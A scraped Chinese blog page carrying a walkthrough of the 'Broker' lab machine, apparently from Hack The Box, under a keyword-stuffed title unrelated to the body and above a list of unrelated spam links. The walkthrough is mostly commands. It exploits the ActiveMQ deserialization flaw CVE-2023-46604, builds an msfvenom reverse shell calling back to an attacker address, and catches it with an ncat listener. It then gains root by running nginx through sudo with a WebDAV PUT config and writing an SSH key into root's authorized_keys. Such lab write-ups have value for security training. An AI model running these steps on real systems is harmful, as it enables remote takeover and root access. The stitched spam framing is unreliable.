当前位置: 首页 > news >正文

学网站开发月薪多少梅州市建设局网站

学网站开发月薪多少,梅州市建设局网站,wordpress购物网站教程,建站系统是什么文章目录 1 端口扫描2 测试思路3 漏洞探测4 CVE-2023-46604漏洞利用5.权限提升 Broker 测试过程 1 端口扫描 nmap -sC -sV 10.129.41.282 测试思路 目标开启了22、80、61616端口#xff0c;在服务器开启了非web及一些需要账号密码进行登录的端口时#xff0c;我们的入手点从这… 文章目录 1 端口扫描2 测试思路3 漏洞探测4 CVE-2023-46604漏洞利用5.权限提升 Broker 测试过程 1 端口扫描 nmap -sC -sV 10.129.41.282 测试思路 目标开启了22、80、61616端口在服务器开启了非web及一些需要账号密码进行登录的端口时我们的入手点从这些端口服务开始在Broker靶场中开启了61616端口并且nmap扫描显示运行5.15.15版本的 Apache ActiveMQ 服务所以我们先从该服务入手。 3 漏洞探测 Nmap扫描结果显示 Apache ActiveMQ 服务版本为 5.15.15搜索该版本是否存已知漏洞。   发现 5.15.15 存在 CVE-2023-46604 反序列化漏洞该漏洞允许远程攻击者通过网络访问基于 Java 的 OpenWire 代理或客户端以运行任意命令通过操作 OpenWire 中的序列化类类型来执行 shell 命令。 4 CVE-2023-46604漏洞利用 1.漏洞利用工具下载 漏洞利用工具地址https://github.com/X1r0z/ActiveMQ-RCE 2.使用msfvenom生成一个ELF可执行文件上传并执行 msfvenom -p linux/x64/shell_reverse_tcp LHOST10.10.14.48 LPORT4444 -f elf -o3.修改poc-linux.xml文件中的IP地址将其修改为我们的服务器地址 4.本地开启web服务器并开启监听 python3 -m http.server 8001 ncat -lnvp 44445.执行漏洞利用脚本 go run main.go -i 10.129.41.28 -p 61616 -u http://10.10.14.4:8001/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ/poc-linux.xml6.获取到反弹shell 5.权限提升 # 获取稳定shell python3 -c import pty;pty.spawn(/bin/bash)1.执行 sudo -l 查看权限 # 显示出自己执行 sudo 的使用者的权限 sudo -l发现可以使用root身份运行nginx并且是空密码使用 所以此时提权思路是如何利用Nginx从普通权限提升到系统权限.    在Nginx中ngx_http_dav_module 模块用于通过 WebDAV 协议进行文件管理自动化。该模块处理 HTTP 和 WebDAV 的 PUT、DELETE、MKCOL、COPY 和 MOVE 方法。 2.自定义配置文件 更新配置并启用 PUT。Nginx 主进程以 root 用户身份运行并设置服务器块应侦听传入连接的端口为1337。 # pwn.conf文件内容如下 user root; worker_processes 4; pid /tmp/nginx.pid; events { worker_connections 768; } http { server { listen 1337; root /; autoindex on; dav_methods PUT; } }wget http://10.10.14.4:8001/pwn.conf3.通过-c参数使nginx运行该配置文件 sudo nginx -c /tmp/pwn.conf4.检查开放端口以证明配置文件是否生效 ss -tlpnpwn.conf中配置的监听端口1337生效配置文件执行成功 5.生成ssh密钥 ssh-keygen6.利用put协议将我的 SSH 公钥写入 root 的 authorized_keys 文件 curl -X PUT localhost:1337/root/.ssh/authorized_keys -d $(cat root.pub)7.ssh连接root ssh -i root rootlocalhost
http://www.zqtcl.cn/news/863147/

相关文章:

  • 南宁网站建设价格医院有关页面设计模板
  • 城乡住房和城乡建设厅网站湖州公司网站建设
  • h5响应式的网站建站空间哪个好
  • 徐州网站建设与推广公众号开发技术风险
  • 男女做差差事的视频网站自己做一个小程序要多少钱
  • 临沂网站建设哪家好重庆建设招标造价信息网站
  • 筑巢网络官方网站深圳网站开发设计公司排名
  • 镇江市网站制作网页的代码实例
  • 吉林省网站制作公司有哪些唐山设计网站公司
  • 浙江国泰建设集团有限公司网站ps软件下载电脑版免费怎么下载
  • 昆明网站建设价格自力教育
  • 黄冈网站推广软件视频下载孝感做网站xgsh
  • 用jsp做一网站的流程图互联网博客网站
  • 南宁一站网 给网站做营销微网站和网站同步像素
  • 如何建设一个视频小网站软件做网站
  • 小企业网站建设公司哪家好网站怎样设计网页
  • 那个网站做搬家推广比较好wordpress twenty eleven
  • 微站图片临淄信息网招聘最新信息
  • 投诉举报网站建设方案宠物网站 模板
  • 生小孩去什么网站做登记有特点的个人网站
  • 汉中市住房和城乡建设局网站学网站建设需要什么
  • 深圳网站建设外包公司排名网络引流怎么做啊?
  • 关于做暧暧的网站php 网站授权
  • 网站上添加子栏目wordpress群组
  • 一站式手机网站制作有没有代做ppt的网站
  • 西安火车站网站建设网站的设计需要什么
  • 弹幕网站开发代码欧洲人喜欢什么样的服务器
  • 有哪些做壁纸的网站好ftp如何备份网站
  • 网站如何推广出去wordpress foopen
  • 网站空格键代码台州椒江网站建设公司